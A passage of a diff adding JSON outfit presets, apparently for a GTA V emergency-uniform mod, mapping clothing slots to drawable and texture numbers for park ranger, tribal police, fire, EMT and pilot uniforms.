+"UnderCoat": "102:2", +"Pants": "90:9", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "17:1", +"Parachute": "79:1" + }, + { +"Name": "Male Park Ranger Class A", +"Gender": "Male", +"Category": "EUP", +"Category2": "U.S NPS", +"Hat": "5:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "201:20", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "26:6", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "31:1" + }, + { +"Name": "Male Park Ranger Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "U.S NPS", +"Hat": "5:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "194:20", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "26:6", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "31:1" + }, + { +"Name": "Male Park Ranger Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "U.S NPS", +"Hat": "5:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "191:20", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "26:6", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "31:1" + }, + { +"Name": "Female Park Ranger Class A", +"Gender": "Female", +"Category": "EUP", +"Category2": "U.S NPS", +"Hat": "5:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "203:20", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "4:10", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "31:1" + }, + { +"Name": "Female Park Ranger Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "U.S NPS", +"Hat": "5:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "196:20", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "4:10", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "31:1" + }, + { +"Name": "Female Park Ranger Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "U.S NPS", +"Hat": "5:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "193:20", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "4:10", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "31:1" + }, + { +"Name": "Male BIA Class A", +"Gender": "Male", +"Category": "EUP", +"Category2": "BIA Tribal Police", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "201:18", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "38:1", +"Pants": "87:13", +"Shoes": "55:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "93:1" + }, + { +"Name": "Male BIA Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "BIA Tribal Police", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "194:23", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "38:1", +"Pants": "87:13", +"Shoes": "55:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "93:1" + }, + { +"Name": "Male BIA Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "BIA Tribal Police", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "191:23", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "38:1", +"Pants": "87:13", +"Shoes": "55:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "93:1" + }, + { +"Name": "Female BIA Class A", +"Gender": "Female", +"Category": "EUP", +"Category2": "BIA Tribal Police", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "203:18", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "3:1", +"Pants": "90:13", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "93:1" + }, + { +"Name": "Female BIA Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "BIA Tribal Police", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "196:23", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "3:1", +"Pants": "90:13", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "93:1" + }, + { +"Name": "Female BIA Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "BIA Tribal Police", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "193:23", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "3:1", +"Pants": "90:13", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "93:1" + }, + { +"Name": "Male LSFD Bunker Pants", +"Gender": "Male", +"Category": "SUP", +"Category2": "LSFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "74:15", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "121:1", +"Shoes": "25:1", +"Accessories": "19:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male LSFD Turnouts", +"Gender": "Male", +"Category": "SUP", +"Category2": "LSFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "316:1", +"UpperSkin": "97:1", +"Decal": "17:1", +"UnderCoat": "154:1", +"Pants": "121:1", +"Shoes": "25:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Male LSFD PPE Gear", +"Gender": "Male", +"Category": "SUP", +"Category2": "LSFD", +"Hat": "46:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "29:1", +"Top": "315:1", +"UpperSkin": "97:1", +"Decal": "17:1", +"UnderCoat": "152:1", +"Pants": "121:1", +"Shoes": "25:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female LSFD Bunker Pants", +"Gender": "Female", +"Category": "SUP", +"Category2": "LSFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "225:22", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "127:1", +"Shoes": "25:1", +"Accessories": "13:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female LSFD Turnouts", +"Gender": "Female", +"Category": "SUP", +"Category2": "LSFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "327:1", +"UpperSkin": "112:1", +"Decal": "16:1", +"UnderCoat": "190:1", +"Pants": "127:1", +"Shoes": "25:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female LSFD PPE Gear", +"Gender": "Female", +"Category": "SUP", +"Category2": "LSFD", +"Hat": "45:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "29:1", +"Top": "326:1", +"UpperSkin": "112:1", +"Decal": "16:1", +"UnderCoat": "188:1", +"Pants": "127:1", +"Shoes": "25:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Male LSFD Arson Investigator", +"Gender": "Male", +"Category": "SUP", +"Category2": "LSFD", +"Hat": "139:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "308:22", +"UpperSkin": "7:1", +"Decal": "1:1", +"UnderCoat": "29:4", +"Pants": "87:7", +"Shoes": "52:1", +"Accessories": "2:1", +"Armor": "1:1", +"Parachute": "59:10" + }, + { +"Name": "Female LSFD Arson Investigator", +"Gender": "Female", +"Category": "SUP", +"Category2": "LSFD", +"Hat": "138:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "319:22", +"UpperSkin": "105:1", +"Decal": "1:1", +"UnderCoat": "24:4", +"Pants": "91:7", +"Shoes": "26:1", +"Accessories": "2:1", +"Armor": "1:1", +"Parachute": "59:10" + }, + { +"Name": "Male LSCoFD Bunker Pants", +"Gender": "Male", +"Category": "SUP", +"Category2": "LSCoFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "74:17", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "121:2", +"Shoes": "28:1", +"Accessories": "19:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male LSCoFD Turnouts", +"Gender": "Male", +"Category": "SUP", +"Category2": "LSCoFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "316:2", +"UpperSkin": "97:1", +"Decal": "18:1", +"UnderCoat": "154:1", +"Pants": "121:2", +"Shoes": "28:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Male LSCoFD PPE Gear", +"Gender": "Male", +"Category": "SUP", +"Category2": "LSCoFD", +"Hat": "46:4", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "29:2", +"Top": "315:2", +"UpperSkin": "97:1", +"Decal": "18:1", +"UnderCoat": "152:1", +"Pants": "121:2", +"Shoes": "28:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female LSCoFD Bunker Pants", +"Gender": "Female", +"Category": "SUP", +"Category2": "LSCoFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "225:23", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "127:2", +"Shoes": "27:1", +"Accessories": "13:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female LSCoFD Turnouts", +"Gender": "Female", +"Category": "SUP", +"Category2": "LSCoFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "327:2", +"UpperSkin": "112:1", +"Decal": "17:1", +"UnderCoat": "190:1", +"Pants": "127:2", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female LSCoFD PPE Gear", +"Gender": "Female", +"Category": "SUP", +"Category2": "LSCoFD", +"Hat": "45:4", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "29:1", +"Top": "326:2", +"UpperSkin": "112:1", +"Decal": "17:1", +"UnderCoat": "188:1", +"Pants": "127:2", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Male LSCoFD Arson Investigator", +"Gender": "Male", +"Category": "SUP", +"Category2": "LSCoFD", +"Hat": "138:3", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "326:23", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "102:2", +"Pants": "5:2", +"Shoes": "52:1", +"Accessories": "7:1", +"Armor": "1:1", +"Parachute": "69:1" + }, + { +"Name": "Female LSCoFD Arson Investigator", +"Gender": "Female", +"Category": "SUP", +"Category2": "LSCoFD", +"Hat": "137:3", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "319:23", +"UpperSkin": "105:1", +"Decal": "1:1", +"UnderCoat": "60:3", +"Pants": "50:1", +"Shoes": "26:1", +"Accessories": "7:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male BCFD Bunker Pants", +"Gender": "Male", +"Category": "SUP", +"Category2": "BCFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "74:16", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "121:1", +"Shoes": "25:1", +"Accessories": "19:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male BCFD Turnouts", +"Gender": "Male", +"Category": "SUP", +"Category2": "BCFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "316:1", +"UpperSkin": "97:1", +"Decal": "19:1", +"UnderCoat": "154:1", +"Pants": "121:1", +"Shoes": "25:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Male BCFD PPE Gear", +"Gender": "Male", +"Category": "SUP", +"Category2": "BCFD", +"Hat": "46:6", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "29:1", +"Top": "315:1", +"UpperSkin": "97:1", +"Decal": "19:1", +"UnderCoat": "152:1", +"Pants": "121:1", +"Shoes": "25:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female BCFD Bunker Pants", +"Gender": "Female", +"Category": "SUP", +"Category2": "BCFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "225:24", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "127:1", +"Shoes": "25:1", +"Accessories": "13:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female BCFD Turnouts", +"Gender": "Female", +"Category": "SUP", +"Category2": "BCFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "327:1", +"UpperSkin": "112:1", +"Decal": "18:1", +"UnderCoat": "190:1", +"Pants": "127:1", +"Shoes": "25:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female BCFD PPE Gear", +"Gender": "Female", +"Category": "SUP", +"Category2": "BCFD", +"Hat": "45:6", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "29:1", +"Top": "326:1", +"UpperSkin": "112:1", +"Decal": "18:1", +"UnderCoat": "188:1", +"Pants": "127:1", +"Shoes": "25:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Male LSFD Fireman Class A", +"Gender": "Male", +"Category": "SUP", +"Category2": "LSFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "119:1", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "11:1", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "58:7" + }, + { +"Name": "Male LSFD Fireman Class B", +"Gender": "Male", +"Category": "SUP", +"Category2": "LSFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "76:8", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "36:1", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "58:2" + }, + { +"Name": "Male LSFD Fireman Class C", +"Gender": "Male", +"Category": "SUP", +"Category2": "LSFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "75:8", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "36:1", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "58:2" + }, + { +"Name": "Male LSFD Fireman Pullover", +"Gender": "Male", +"Category": "SUP", +"Category2": "LSFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "240:12", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "36:1", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female LSFD Fireman Class A", +"Gender": "Female", +"Category": "SUP", +"Category2": "LSFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "19:1", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "8:1", +"Pants": "4:1", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "58:7" + }, + { +"Name": "Female LSFD Fireman Class B", +"Gender": "Female", +"Category": "SUP", +"Category2": "LSFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "27:8", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "8:1", +"Pants": "35:1", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "58:2" + }, + { +"Name": "Female LSFD Fireman Class C", +"Gender": "Female", +"Category": "SUP", +"Category2": "LSFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "26:8", +"UpperSkin": "10:1", +"Decal": "1:1", +"UnderCoat": "8:1", +"Pants": "35:1", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "58:2" + }, + { +"Name": "Female LSFD Fireman Pullover", +"Gender": "Female", +"Category": "SUP", +"Category2": "LSFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "224:12", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "8:1", +"Pants": "35:1", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male LSFD EMT Class B", +"Gender": "Male", +"Category": "SUP", +"Category2": "LSFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "76:1", +"UpperSkin": "87:1", +"Decal": "1:1", +"UnderCoat": "55:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "31:2", +"Armor": "30:1", +"Parachute": "58:1" + }, + { +"Name": "Male LSFD EMT Class C", +"Gender": "Male", +"Category": "SUP", +"Category2": "LSFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "75:1", +"UpperSkin": "93:1", +"Decal": "1:1", +"UnderCoat": "55:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "31:2", +"Armor": "30:1", +"Parachute": "58:1" + }, + { +"Name": "Male LSFD EMT Pullover", +"Gender": "Male", +"Category": "SUP", +"Category2": "LSFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "240:13", +"UpperSkin": "87:1", +"Decal": "1:1", +"UnderCoat": "55:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "31:2", +"Armor": "30:1", +"Parachute": "49:1" + }, + { +"Name": "Male LSFD T-Shirt", +"Gender": "Male", +"Category": "SUP", +"Category2": "LSFD", +"Hat": "0:0", +"Glasses": "24:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "74:15", +"UpperSkin": "86:1", +"Decal": "1:1", +"UnderCoat": "55:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "30:1", +"Parachute": "1:1" + }, + { +"Name": "Female LSFD EMT Class B", +"Gender": "Female", +"Category": "SUP", +"Category2": "LSFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "27:1", +"UpperSkin": "102:1", +"Decal": "1:1", +"UnderCoat": "7:1", +"Pants": "106:1", +"Shoes": "53:1", +"Accessories": "15:2", +"Armor": "34:1", +"Parachute": "58:1" + }, + { +"Name": "Female LSFD EMT Class C", +"Gender": "Female", +"Category": "SUP", +"Category2": "LSFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "26:1", +"UpperSkin": "110:1", +"Decal": "1:1", +"UnderCoat": "7:1", +"Pants": "106:1", +"Shoes": "53:1", +"Accessories": "15:2", +"Armor": "34:1", +"Parachute": "58:1" + }, + { +"Name": "Female LSFD EMT Pullover", +"Gender": "Female", +"Category": "SUP", +"Category2": "LSFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "224:13", +"UpperSkin": "102:1", +"Decal": "1:1", +"UnderCoat": "7:1", +"Pants": "106:1", +"Shoes": "53:1", +"Accessories": "15:2", +"Armor": "34:1", +"Parachute": "49:1" + }, + { +"Name": "Female LSFD T-Shirt", +"Gender": "Female", +"Category": "SUP", +"Category2": "LSFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "225:22", +"UpperSkin": "110:1", +"Decal": "1:1", +"UnderCoat": "7:1", +"Pants": "106:1", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "34:1", +"Parachute": "49:1" + }, + { +"Name": "Male LSFD Winter Jacket", +"Gender": "Male", +"Category": "SUP", +"Category2": "LSFD", +"Hat": "3:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "250:2", +"UpperSkin": "32:1", +"Decal": "58:1", +"UnderCoat": "16:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "127:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female LSFD Winter Jacket", +"Gender": "Female", +"Category": "SUP", +"Category2": "LSFD", +"Hat": "6:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "258:2", +"UpperSkin": "37:1", +"Decal": "66:1", +"UnderCoat": "15:1", +"Pants": "106:1", +"Shoes": "53:1", +"Accessories": "97:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male LSFD EMT Jacket", +"Gender": "Male", +"Category": "SUP", +"Category2": "LSFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "152:3", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "55:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "13:1", +"Parachute": "49:1" + }, + { +"Name": "Female LSFD EMT Jacket", +"Gender": "Female", +"Category": "SUP", +"Category2": "LSFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "149:3", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "7:1", +"Pants": "106:1", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "12:1", +"Parachute": "1:1" + }, + { +"Name": "Male LSFD MVA PPE", +"Gender": "Male", +"Category": "SUP", +"Category2": "LSFD", +"Hat": "138:1", +"Glasses": "22:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "315:1", +"UpperSkin": "91:1", +"Decal": "17:1", +"UnderCoat": "16:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female LSFD MVA PPE", +"Gender": "Female", +"Category": "SUP", +"Category2": "LSFD", +"Hat": "137:1", +"Glasses": "26:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "326:1", +"UpperSkin": "110:1", +"Decal": "16:1", +"UnderCoat": "15:1", +"Pants": "106:1", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male LSFD Tac-Medic", +"Gender": "Male", +"Category": "SUP", +"Category2": "LSFD", +"Hat": "60:10", +"Glasses": "0:0", +"Ear": "34:1", +"Watch": "0:0", +"Mask": "186:1", +"Top": "221:21", +"UpperSkin": "94:1", +"Decal": "1:1", +"UnderCoat": "55:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "4:3", +"Parachute": "50:8" + }, + { +"Name": "Female LSFD Tac-Medic", +"Gender": "Female", +"Hat": "60:1", +"Glasses": "23:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "231:21", +"UpperSkin": "110:1", +"Decal": "1:1", +"UnderCoat": "7:1", +"Pants": "91:12", +"Shoes": "26:1", +"Accessories": "1:1", +"Armor": "6:1", +"Parachute": "50:1" + }, + { +"Name": "Male LSFD Pilot", +"Gender": "Male", +"Category": "SUP", +"Category2": "LSFD", +"Hat": "79:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "109:6", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "65:3", +"Shoes": "26:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female LSFD Pilot", +"Gender": "Female", +"Category": "SUP", +"Category2": "LSFD", +"Hat": "78:1", +"Glasses": "14:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "100:6", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "67:3", +"Shoes": "25:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male LSCoFD Fireman Class A", +"Gender": "Male", +"Category": "SUP", +"Category2": "LSCoFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "119:3", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "26:4", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "38:2" + }, + { +"Name": "Male LSCoFD Fireman Class B", +"Gender": "Male", +"Category": "SUP", +"Category2": "LSCoFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "76:3", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "26:4", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "38:2" + }, + { +"Name": "Male LSCoFD Fireman Class C", +"Gender": "Male", +"Category": "SUP", +"Category2": "LSCoFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "75:3", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "26:4", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "38:2" + }, + { +"Name": "Male LSCoFD Fireman Pullover", +"Gender": "Male", +"Category": "SUP", +"Category2": "LSCoFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "240:14", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "26:4", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female LSCoFD Fireman Class A", +"Gender": "Female", +"Category": "SUP", +"Category2": "LSCoFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "19:3", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "8:1", +"Pants": "42:4", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "38:2" + }, + { +"Name": "Female LSCoFD Fireman Class B", +"Gender": "Female", +"Category": "SUP", +"Category2": "LSCoFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "27:4", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "8:1", +"Pants": "42:4", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "38:2" + }, + { +"Name": "Female LSCoFD Fireman Class C", +"Gender": "Female", +"Category": "SUP", +"Category2": "LSCoFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "26:4", +"UpperSkin": "10:1", +"Decal": "1:1", +"UnderCoat": "8:1", +"Pants": "42:4", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "38:2" + }, + { +"Name": "Female LSCoFD Fireman Pullover", +"Gender": "Female", +"Category": "SUP", +"Category2": "LSCoFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "224:14", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "8:1", +"Pants": "42:4", 